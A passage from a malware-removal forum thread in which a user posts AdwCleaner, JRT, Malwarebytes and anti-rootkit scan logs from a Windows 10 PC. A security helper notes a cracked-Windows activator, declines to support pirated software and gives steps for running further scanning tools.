    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\nps.pastaleads.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\pastaleads.com
    [-] Key Deleted : HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\softonic.com

    ***** [ Web browsers ] *****

    [-] [C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : booedmolknjekdopkepjjeckmjkdpfgl
    [-] [C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : flpcjncodpafbgdpnkljologafpionhb

    *************************

    :: "Tracing" keys removed
    :: Winsock settings cleared

    *************************

    C:\AdwCleaner\AdwCleaner[C1].txt - [5290 bytes] - [01/03/2016 12:31:36]
    C:\AdwCleaner\AdwCleaner[S1].txt - [5161 bytes] - [01/03/2016 12:27:52]

    ########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [5436 bytes] ##########

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Malwarebytes
    Version: 8.0.3 (02.09.2016)
    Operating System: Windows 10 Home x64
    Ran by Kym (Administrator) on 01-03-16 at 12:35:19.03
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




    File System: 4

    Successfully deleted: C:\ai_recyclebin (Folder)
    Successfully deleted: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage-journal (File)
    Successfully deleted: C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage (File)
    Successfully deleted: C:\Users\Kym\AppData\Roaming\speedrunnerslog.txt (File)



    Registry: 0





    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on 01-03-16 at 12:36:57.23
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    CKScanner 2.5 - Additional Security Risks - These are not necessarily bad
    c:\windows\autokms\autokms.exe
    scanner sequence 3.AP.11.PANARZ
    ----- EOF -----

    Malwarebytes Anti-Malware
    www.malwarebytes.org

    Scan Date: 01-03-16
    Scan Time: 12:43 PM
    Logfile:
    Administrator: Yes

    Version: 2.2.0.1024
    Malware Database: v2016.02.29.05
    Rootkit Database: v2016.02.27.01
    License: Free
    Malware Protection: Disabled
    Malicious Website Protection: Disabled
    Self-protection: Disabled

    OS: Windows 10
    CPU: x64
    File System: NTFS
    User: Kym

    Scan Type: Threat Scan
    Result: Completed
    Objects Scanned: 375123
    Time Elapsed: 3 min, 50 sec

    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Enabled
    PUM: Enabled

    Processes: 0
    (No malicious items detected)

    Modules: 0
    (No malicious items detected)

    Registry Keys: 13
    PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\TYPELIB\{43C482BB-F984-4D66-9194-429158BE57E1}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
    PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\INTERFACE\{3361DCDD-E396-4153-AF77-F6AAB54F3CBA}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
    PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\INTERFACE\{3361DCDD-E396-4153-AF77-F6AAB54F3CBA}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
    PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\INTERFACE\{3361DCDD-E396-4153-AF77-F6AAB54F3CBA}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
    PUP.Optional.Yontoo, HKLM\SOFTWARE\WOW6432NODE\CLASSES\TYPELIB\{43C482BB-F984-4D66-9194-429158BE57E1}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
    PUP.Optional.Yontoo, HKLM\SOFTWARE\CLASSES\WOW6432NODE\TYPELIB\{43C482BB-F984-4D66-9194-429158BE57E1}, Quarantined, [f980184e4c4df343a6fddcde08fa29d7],
    PUP.Optional.AdvancedPCCare, HKLM\SOFTWARE\MICROSOFT\TRACING\advancedpccare_RASAPI32, Quarantined, [a0d9b3b3fd9ce056981b6be312f22fd1],
    PUP.Optional.AdvancedPCCare, HKLM\SOFTWARE\MICROSOFT\TRACING\advancedpccare_RASMANCS, Quarantined, [3742264028713df953602a24798ba65a],
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32LDR , Quarantined, [b7c29fc762372b0b875778a3e71d8b75],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}, Quarantined, [7207c79f6b2e1e18b00668f612f27a86],
    PUP.Optional.SearchProtect.AppFlsh, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\INSTALLEDSDB\{cf2797aa-b7ec-e311-8ed9-005056c00008}, Quarantined, [5c1d73f31e7b64d2d0e780de3dc71be5],
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\PCV-VARS, Quarantined, [9bdeb5b10792b284f106095a0004f30d],
    PUP.Optional.WindowsMangerProtect, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\WindowsMangerProtect, Quarantined, [5b1ee97d21782c0a9a4232eebd470000],

    Registry Values: 6
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\chrome.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [7ffaa6c01b7eee48a03d79a254b034cc]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\explorer.xxx|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [4c2d2a3ce4b572c436a79c7f07fdc937]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\firefox.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [5f1a94d2c1d86fc722bbd8438b79bf41]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\iexplore.exe|{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [a3d61056ff9a5adccd10be5d877d35cb]
    PUP.Optional.Trovi, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\APPCOMPATFLAGS\CUSTOM\LAYERS\VC32Ldr |{8a4d5a43-c64a-45ab-bdf4-804fe18ceafd}.sdb, 130604858227272555, Quarantined, [b7c29fc762372b0b875778a3e71d8b75]
    PUP.Optional.WinYahoo, HKLM\SOFTWARE\PCV-VARS|affiliateid, Quarantined, [9bdeb5b10792b284f106095a0004f30d],

    Registry Data: 1
    Trojan.DNSChanger.DNSRst, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|NameServer, 82.163.143.171 82.163.142.173, Good: (8.8.8.8), Bad: (82.163.143.171 82.163.142.173),Replaced,[48311e48d6c36ec8783ac13f1fe6cc34]

    Folders: 0
    (No malicious items detected)

    Files: 8
    PUP.Optional.BestPriceNinja, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage, Quarantined, [f1886cfa9504d462b6818ad9c24243bd],
    PUP.Optional.BestPriceNinja, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.bestpriceninja.com_0.localstorage-journal, Quarantined, [75048adcdbbe48ee092e70f312f2e41c],
    PUP.Optional.eShopComp, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.eshopcomp.com_0.localstorage, Quarantined, [54251a4c8a0f4fe75ac485e3de26f60a],
    PUP.Optional.eShopComp, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_pstatic.eshopcomp.com_0.localstorage-journal, Quarantined, [b3c60b5b09901224f12d3a2e3cc88f71],
    PUP.Optional.CrossRider, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage, Quarantined, [cdacabbb930658dee19ce08bd430bc44],
    PUP.Optional.CrossRider, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_d19tqk5t6qcjac.cloudfront.net_0.localstorage-journal, Quarantined, [1564283e1b7e3bfb4c3157149e66a15f],
    PUP.Optional.UTop, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_utop.it_0.localstorage, Quarantined, [a5d4283e1c7da591102e0f652dd7c63a],
    PUP.Optional.UTop, C:\Users\Kym\AppData\Local\Google\Chrome\User Data\Default\Local Storage\http_utop.it_0.localstorage-journal, Quarantined, [1e5b5e0829708caaaf8f660e867eb14f],

    Physical Sectors: 0
    (No malicious items detected)


    (end)

  7. #7
    Security Expert Juliet's Avatar
    Join Date
    Feb 2007
    Location
    Deep South
    Posts
    3,818

    Default

    c:\windows\autokms\autokms.exe
    The above file can be related to a cracked version of Windows or Microsoft Office.
    Is your version legit?

    Tell me what your computer is doing now?
    Windows Insider MVP Consumer Security 2009 - 2017
    Please do not PM me for Malware help, we all benefit from posting on the open board.

  8. #8
    Junior Member
    Join Date
    Feb 2016
    Posts
    11

    Default Windows 10

    My version isn't legit, I used a cracked version. However, I do have a legit Windows 7 CD and serial if you think I should reinstall?

    Some websites are fine, but others are constantly spammed by ads. Would you like me to send a screenshot?

  9. #9
    Security Expert Juliet's Avatar
    Join Date
    Feb 2007
    Location
    Deep South
    Posts
    3,818

    Default

    We do not support the use of Pirated-Warez-Keygens-Cracked software.

    If seeking help in our Malware removal forum please know that users who have programs obtained by such methods will be asked to remove them, since our help could otherwise be seen as aiding copyright violations. In doing the crack, the 'cracker' has broken the 'End User License Agreement' (EULA) of the product.

    You will need to remove your cracked version of Microsoft Office.

    ~~~~~~~~~~~~~~~~~~~~

    Malwarebytes Anti-Rootkit
    • Download Malwarebytes Anti-Rootkit
    • Once the file has been downloaded, right-click on the downloaded file and select the Extract all menu option.
    • Follow the instructions to extract the ZIP file to a folder called mbar-versionnumber on your desktop.
    • Once the ZIP file has been extracted, open the folder and when that folder opens, double-click on the mbar folder.
    • Double-click on the mbar.exe file to launch Malwarebytes Anti-Rootkit.
    • After you double-click on the mbar.exe file, you may receive a User Account Control (UAC) message asking if you are sure you wish to allow the program to run. Please allow it so that Malwarebytes Anti-Rootkit can start correctly.
    • Malwarebytes Anti-Rootkit will now install necessary drivers that are required for the program to operate correctly.
    • If you receive a DDA driver message like "could not load DDA driver", click on the Yes button and Malwarebytes Anti-Rootkit will now restart your computer and will start automatically.
    • On the introduction screen, please click on the Next button to continue.
    • Next you will see the Update Database screen.
    • Click on the Update button so Malwarebytes Anti-Rootkit can download the latest definition updates.
    • When the update has finished, click on the Next button.
    • Next you can select some basic scanning options. Make sure the Drivers, Sectors, and System scan targets are selected before you click on the Scan button.
    • Malwarebytes Anti-Rootkit will now start scanning your computer for rootkits. This scan can take some time, so please be patient.
    • When the scan with Malwarebytes Anti-Rootkit is finished, the program will display a screen with the results from the scan.
    • Make sure everything is selected and that the option to create a restore point is checked.
    • Next click on the Cleanup button. Malwarebytes Anti-Rootkit will then prompt you to reboot your computer.
    • Click on the Yes button to restart your computer.

    • There will now be two log files created in the mbar folder: one called system-log.txt and one that starts with mbar-log.
    • The mbar-log file will always start with mbar-log, but the rest will be named using a timestamp indicating the time it was run.
      • For example, mbar-log-2012-11-12 (19-13-32).txt corresponds to mbar-log-year-month-day (hour-minute-second).txt.

    • The system-log.txt contains information about each time you have run MBAR and contains diagnostic information from the program.

    ~~~~~~~~~~~

    I need to see a fresh run of Farbar Recovery Scan Tool.

    • Right-Click FRST.exe / FRST64.exe and select Run as administrator to run the programme.
    • Click Yes to the disclaimer.
    • Ensure the Addition.txt box is checked.
    • Click the Scan button and let the programme run.
    • Upon completion, click OK, then OK on the Addition.txt pop up screen.
    • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply.

  10. #10
    Junior Member
    Join Date
    Feb 2016
    Posts
    11

    Default System-log, Mbar-log, FRST, Addition

    The Malwarebytes Anti-Rootkit finished the scan and said "Scan Finished: No malware found!".

    Malwarebytes Anti-Rootkit BETA 1.9.3.1001
    www.malwarebytes.org

    Database version:
    main: v2016.03.01.04
    rootkit: v2016.02.27.01

    Windows 10 x64 NTFS
    Internet Explorer 11.0.10240.16683
    Kym :: KYM-PC [administrator]

    01-03-16 9:58:00 PM
    mbar-log-2016-03-01 (21-58-00).txt

    Scan type: Quick scan
    Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
    Scan options disabled:
    Objects scanned: 392185
    Time elapsed: 10 minute(s), 43 second(s)

    Memory Processes Detected: 0
    (No malicious items detected)

    Memory Modules Detected: 0
    (No malicious items detected)

    Registry Keys Detected: 0
    (No malicious items detected)

    Registry Values Detected: 0
    (No malicious items detected)

    Registry Data Items Detected: 0
    (No malicious items detected)

    Folders Detected: 0
    (No malicious items detected)

    Files Detected: 0
    (No malicious items detected)

    Physical Sectors Detected: 0
    (No malicious items detected)

    (end)

    ---------------------------------------
    Malwarebytes Anti-Rootkit BETA 1.09.3.1001

    (c) Malwarebytes Corporation 2011-2012

    OS version: 10.0.9200 Windows 10 x64

    Account is Administrative

    Internet Explorer version: 11.0.10240.16683

    File system is: NTFS
    Disk drives: C:\ DRIVE_FIXED, D:\ DRIVE_FIXED, F:\ DRIVE_FIXED
    CPU speed: 3.392000 GHz
    Memory total: 17061519360, free: 14123868160

    Downloaded database version: v2016.03.01.04
    Downloaded database version: v2016.02.27.01
    Downloaded database version: v2016.02.22.02
    =======================================
    Initializing...
    Driver version: 0.3.0.4
    ------------ Kernel report ------------
    03/01/2016 21:57:55
    ------------ Loaded modules -----------
    ----------- End -----------
    Done!

    Scan started
    Database versions:
    main: v2016.03.01.04
    rootkit: v2016.02.27.01

    <<<2>>>
    Physical Sector Size: 512
    Drive: 1, DevicePointer: 0xffffe0001f007060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
    --------- Disk Stack ------
    DevicePointer: 0xffffe0001f008300, DeviceName: Unknown, DriverName: \Driver\partmgr\
    DevicePointer: 0xffffe0001f007060, DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
    DevicePointer: 0xffffe0001ca1e690, DeviceName: Unknown, DriverName: \Driver\ACPI\
    DevicePointer: 0xffffe0001ca23040, DeviceName: Unknown, DriverName: \Driver\ACPI\
    DevicePointer: 0xffffe0001ca22060, DeviceName: \Device\00000030\, DriverName: \Driver\iaStorA\
    ------------ End ----------
    Alternate DeviceName: \Device\Harddisk1\DR1\, DriverName: \Driver\disk\
    Upper DeviceData: 0x0, 0x0, 0x0
    Lower DeviceData: 0x0, 0x0, 0x0
    <<<3>>>
    Volume: C:
    File system type: NTFS
    SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
    <<<2>>>
    <<<3>>>
    Volume: C:
    File system type: NTFS
    SectorSize = 512, ClusterSize = 4096, MFTRecordSize = 1024, MFTIndexSize = 4096 bytes
    Scanning drivers directory: C:\WINDOWS\SYSTEM32\drivers...
    Done!
    Physical Sector Size: 512
    Drive: 0, DevicePointer: 0xffffe0001f009060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
    --------- Disk Stack ------
    DevicePointer: 0xffffe0001f009b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
    DevicePointer: 0xffffe0001f009060, DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
    DevicePointer: 0xffffe0001ca1ae40, DeviceName: Unknown, DriverName: \Driver\ACPI\
    DevicePointer: 0xffffe0001ca23760, DeviceName: Unknown, DriverName: \Driver\ACPI\
    DevicePointer: 0xffffe0001ca26060, DeviceName: \Device\0000002f\, DriverName: \Driver\iaStorA\
    ------------ End ----------
    Alternate DeviceName: \Device\Harddisk0\DR0\, DriverName: \Driver\disk\
    Upper DeviceData: 0x0, 0x0, 0x0
    Lower DeviceData: 0x0, 0x0, 0x0
    Drive 0
    Scanning MBR on drive 0...
    Inspecting partition table:
    MBR Signature: 55AA
    Disk Signature: 4E0A8E17

    Partition information:

    Partition 0 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 206848 Numsec = 1953312768
    Partition is not bootable
    Partition file system is NTFS

    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Disk Size: 1000204886016 bytes
    Sector size: 512 bytes

    Done!
    Drive 1
    This is a System drive
    Scanning MBR on drive 1...
    Inspecting partition table:
    MBR Signature: 55AA
    Disk Signature: 4B95E549

    Partition information:

    Partition 0 type is Primary (0x7)
    Partition is ACTIVE.
    Partition starts at LBA: 206848 Numsec = 234232752
    Partition is bootable
    Partition file system is NTFS

    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Disk Size: 120034123776 bytes
    Sector size: 512 bytes

    Done!
    Physical Sector Size: 512
    Drive: 2, DevicePointer: 0xffffe00020a38060, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\disk\
    --------- Disk Stack ------
    DevicePointer: 0xffffe00020a38b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
    DevicePointer: 0xffffe00020a38060, DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\disk\
    DevicePointer: 0xffffe00020a07b10, DeviceName: \Device\00000041\, DriverName: \Driver\USBSTOR\
    ------------ End ----------
    Alternate DeviceName: \Device\Harddisk2\DR2\, DriverName: \Driver\disk\
    Upper DeviceData: 0x0, 0x0, 0x0
    Lower DeviceData: 0x0, 0x0, 0x0
    Drive 2
    Scanning MBR on drive 2...
    Inspecting partition table:
    MBR Signature: 55AA
    Disk Signature: 908BDE7D

    Partition information:

    Partition 0 type is Primary (0x7)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 2048 Numsec = 3907027116
    Partition is not bootable
    Partition file system is NTFS

    Partition 1 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Partition 2 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Partition 3 type is Empty (0x0)
    Partition is NOT ACTIVE.
    Partition starts at LBA: 0 Numsec = 0
    Partition is not bootable

    Disk Size: 2000398933504 bytes
    Sector size: 512 bytes

    Done!
    Physical Sector Size: 0
    Drive: 3, DevicePointer: 0xffffe00021920060, DeviceName: \Device\Harddisk3\DR3\, DriverName: \Driver\disk\
    --------- Disk Stack ------
    DevicePointer: 0xffffe00021920b10, DeviceName: Unknown, DriverName: \Driver\partmgr\
    DevicePointer: 0xffffe00021920060, DeviceName: \Device\Harddisk3\DR3\, DriverName: \Driver\disk\
    DevicePointer: 0xffffe000209bfb10, DeviceName: \Device\00000047\, DriverName: \Driver\USBSTOR\
    ------------ End ----------
    File "C:\WINDOWS\System32\drivers\NDISVIRTUALBUS.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ndiswan.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\netbt.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\NPSVCTRIG.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\NPSVCTRIG.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\nsiproxy.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\NV_AGP.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbehci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbehci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbohci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbohci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbuhci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbuhci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\USBXHCI.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\parport.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\vds.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\partmgr.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\pci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\pcw.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\pdc.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\pcmcia.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\PEAuth.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\qwavedrv.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\raspptp.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\processr.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\pacer.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rasacd.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\agilevpn.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\raspppoe.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rassstp.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rdbss.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rdpbus.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rdpdr.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\RDPVIDEOMINIPORT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\RDPVIDEOMINIPORT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\rdyboost.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\servicing\TRUSTEDINSTALLER.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vms3cap.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\sbp2port.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WdFilter.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\scfilter.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SENSORDATASERVICE.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\serenum.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\SerCx2.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\sermouse.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\URSCX01000.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\sfloppy.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\snmptrap.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\SPACEPORT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\SPACEPORT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sppsvc.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\srvnet.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\volmgrx.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\storahci.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\stornvme.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\storufs.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\storvsc.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\tcpipreg.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\tdx.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\tpm.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\terminpt.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vdrvroot.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\TsUsbFlt.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\TsUsbGD.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\UAGP35.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\uaspstor.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\UcmCx.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\Udecx.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbccgp.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\UI0DETECT.EXE" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ULIAGPKX.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\umbus.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\USBAUDIO.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbcir.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\USBHUB3.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbprint.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\usbser.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\USBSTOR.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\VERIFIEREXT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vhdmp.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vhf.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vmbus.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\VMBusHID.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\volsnap.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vsmraid.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vwifibus.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\vwififlt.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\wacompen.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WUDFRd.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\wanarp.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\winusb.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbengine.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WdBoot.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\Wdf01000.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WdiWiFi.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WdNisDrv.sys" is sparse (flags = 32768)
    File "C:\Program Files\Windows Defender\NisSrv.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\wfplwfs.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WINDOWSTRUSTEDRT.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\wmiacpi.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbem\WmiApSrv.exe" is sparse (flags = 32768)
    File "C:\Program Files\Windows Media Player\wmpnetwk.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\wpcfltr.sys" is sparse (flags = 32768)
